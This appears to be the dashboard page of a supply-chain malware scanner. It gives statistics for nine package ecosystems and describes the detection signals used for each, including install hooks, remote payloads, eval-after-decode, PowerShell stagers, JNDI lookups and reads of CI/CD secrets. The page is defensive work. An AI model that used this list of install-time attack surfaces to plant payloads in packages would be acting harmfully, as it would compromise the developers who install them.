Nine ecosystems, one gate.

Packages scanned

483,634

High risk

4,569

Review

53,806

High-severity findings

33,483

Last scan

22s ago

JavaScript / Node.js. Largest registry by package count and the most common supply-chain attack target; the scanner covers preinstall hooks, install-time remote payloads, lifecycle-diff vs prior release, and known-IOC filename matching.

Packages scanned

50,888

High risk

3,018

Review

10,262

High-severity findings

5,498

Last scan

24s ago

Python. Source distributions execute setup.py at install time, making it the canonical Python supply-chain surface. Wheels skip setup.py but ship native code; the scanner walks both formats, with a rustpython-parser AST analyzer for source files.

Packages scanned

1,814

High risk

27

Review

189

High-severity findings

72

Last scan

2m ago

Ruby. C-extension gems run extconf.rb at install time; the scanner gates on shell-out paired with eval/network/deserialize combos so legit pkg-config / make calls aren't penalized.

Packages scanned

30,792

High risk

257

Review

4,089

High-severity findings

182

Last scan

57s ago

Rust. build.rs runs on `cargo build`; proc-macro crates' library code runs during the consumer's compilation. Detection focuses on Process::Command + network/base64/env-token combos at build time.

Packages scanned

545

High risk

0

Review

7

High-severity findings

1

Last scan

9h ago

Java / JVM. Source jars are opportunistically downloaded for static analysis; bytecode-only releases get path + manifest + native-blob signals. Detection targets JNDI lookups (Log4Shell family), Class.forName-based reflection bypass, URLClassLoader.defineClass, and static-init side effects.

Packages scanned

35,147

High risk

0

Review

3,286

High-severity findings

0

Last scan

30s ago

.NET. The PowerShell hook trio is the canonical NuGet supply-chain attack vector. Scanner covers IEX stagers, hidden powershell.exe spawns, base64 decode combos, Run-key persistence, and CI/CD secret env reads at hook time.

Packages scanned

4,408

High risk

148

Review

987

High-severity findings

404

Last scan

39m ago

PHP. composer.json scripts run shell during install; PHP source carries the eval/exec primitives. Detection gates on combos: base64/gz/hex decode + eval/exec, remote include/require, deprecated assert(string) backdoor, and remote-fetch-with-exec chains.

Packages scanned

119,029

High risk

1,229

Review

20,209

High-severity findings

629

Last scan

39s ago

Go. Modules are immutable in the public proxy, so the supply-chain surface is install-time init() side effects, cgo C code, build-tagged stubs, and `replace` redirects. Scanner is preview-quality (proxy.golang.org existence check + module zip walk pending).

Packages scanned

2,158

High risk

3

Review

139

High-severity findings

1

Last scan

5m ago

Dart / Flutter. Pub packages can ship build_runner code generators that execute at consumer build time, plus dart:ffi native library loads. Scanner is preview-quality (pub.dev existence check + tarball walk pending).